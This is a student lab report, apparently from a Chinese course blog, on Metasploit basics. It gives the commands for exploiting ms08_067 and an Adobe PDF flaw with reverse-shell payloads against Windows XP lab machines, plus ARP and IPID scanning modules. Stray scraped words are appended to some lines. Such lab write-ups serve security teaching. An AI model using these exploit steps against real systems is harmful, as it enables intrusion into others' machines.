20155205 郝博雅 Exp5 MSF基礎應用

20155205 郝博雅 Exp5 MSF基礎應用

1、實驗目標

  • 本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:html

    1.一個主動攻擊實踐,如ms08_067; (1分)shell

    1. 一個針對瀏覽器的攻擊,如ms11_050;(1分)windows

    2. 一個針對客戶端的攻擊,如Adobe;(1分)api

    3. 成功應用任何一個輔助模塊。(0.5分)瀏覽器

基礎問題回答:用本身的話解釋什麼是exploit,payload,encode?

  • exploit至關於一個載體,把攻擊代碼運送到耙機中;payload至關於shellcode;encode一是爲了不payload中出現壞字符,從而影響payload的功能,二是爲了實現免殺。

2、實驗內容

主動攻擊:ms08_067漏洞攻擊

靶機: windows XP SP3(English)網絡

攻擊機:kaliapp

  • 輸入msfconsole進入控制檯,輸入search ms08_067指令查詢一下針對該漏洞能夠運用的攻擊模塊:

  • 輸入use exploit/windows/smb/ms08_067_netapi使用該模塊:

  • 使用show payloads查看能夠供咱們使用的payload並找到一個可用的攻擊載荷:

  • set payload generic/shell_reverse_tcp即tcp反向回連設置payloadtcp

  • 使用指令show options查看咱們須要設置的參數,須要設置一個RHOST(靶機的IP地址)和一個LHOST(攻擊機的IP地址)。而且看到target是0,即自動選擇目標系統類型,就不用再設置了。工具

  • 使用set LHOST 192.168.206.129set LPORT 5205設置本機地址和端口,使用set RHOST 192.168.206.135設置耙機地址,使用show options查看設置結果:

  • 接着使用exploit指令開始攻擊,出現了一個錯誤:

  • 關閉XP的防火牆:

  • 攻擊成功,獲取了耙機的shell:

對瀏覽器攻擊:ms10_046漏洞攻擊

攻擊機:kali
靶機:windowsXP Professional sp2
IE:8.0測試

  • search ms10_046指令查看能夠運用的攻擊模塊,進入模塊後將SRVHOST和LHOST填攻擊機的IP地址,在ip瀏覽器中輸入生成的URL後會出錯:

  • 這個錯誤不少人都遇到了,也沒有解決,算一個失敗的例子吧,不過老師不是說攻擊百分之九十都是失敗麼

對Adobe的漏洞攻擊:adobe_toolbutton

攻擊機:kali
靶機:windowsXP Professional sp2
Adobe版本:9.3

  • 先輸入search adobe查詢針對adobe攻擊的模塊,使用use exploit/windows/fileformat/adobe_toolbutton,使用set payload windows/meterpreter/reverse_tcp設置payload

  • show options看一下須要設置的參數

  • 設置好參數後輸入exploit開始攻擊,能夠看到生成了pdf文件。

  • 將pdf文件拷到xp裏,在kali上輸入back退出當前模塊,進入監聽模塊
  • 在靶機上打開pdf文件

  • 能夠看到攻擊成功,獲取了xp的shell
  • 強行關閉了pdf文件後,能夠看到監聽的會話被關閉了。

輔助模塊的應用1:arp_sweep

  • 先使用show auxiliary查看w全部的輔助模塊以及他們的用途,在metasploit中,輔助模塊的用途很是普遍,他們能夠是掃描器/拒絕服務攻擊工具/fuzz測試器,以及其餘類型的工具。

  • 模塊實在是太多了,找了不少個但搜索了一下作起來都比較困難,所以使用show scanner找一個比較簡單一點的,最後選擇了arp_sweep。能夠參考(MSF內網滲透 掃描模塊
  • arp_sweep使用ARP請求枚舉本地局域網絡中的全部活躍主機進行掃描。進入模塊後查詢一下參數

msf > use auxiliary/scanner/discovery/arp_sweep   ---進入arp_sweep 模塊
msf auxiliary(arp_sweep) > show options  ---查詢模塊參數

以後進行參數設置

msf auxiliary(arp_sweep) > set RHOSTS 10.10.10.0/24--用set進行hosts主機段設置
RHOSTS => 10.10.10.0/24
msf auxiliary(arp_sweep) > set THREADS 50 --加快掃描速度
THREADS => 50
msf auxiliary(arp_sweep) > run --執行run進行掃描
  • 由於我只開了一個虛擬機,因此只掃到了一個活躍機。

  • 但裏面那個 10.43.32.1 appears to be up (USC INFORMATION SCIENCES INST).是啥呢??查了一下後面英文的意思是加利福尼亞大學洛杉磯分校。。。

輔助模塊的應用2:ipidseq

  • 功能:掃描網段中的存活ip,它會識別被發現主機的IPID(用於跟蹤IP包的次序的一種技術)序列模式,而且表示出哪些是0、隨機或遞增的。
  • 老規矩,先search ipidseq後選擇相應模塊,查看須要設置的參數:
  • 設置參數後exploit,掃描成功

  • 還能夠掃描一個網段,由於等待時間太長了只截了部分結果:

db_autopwn實戰

相關文章
相關標籤/搜索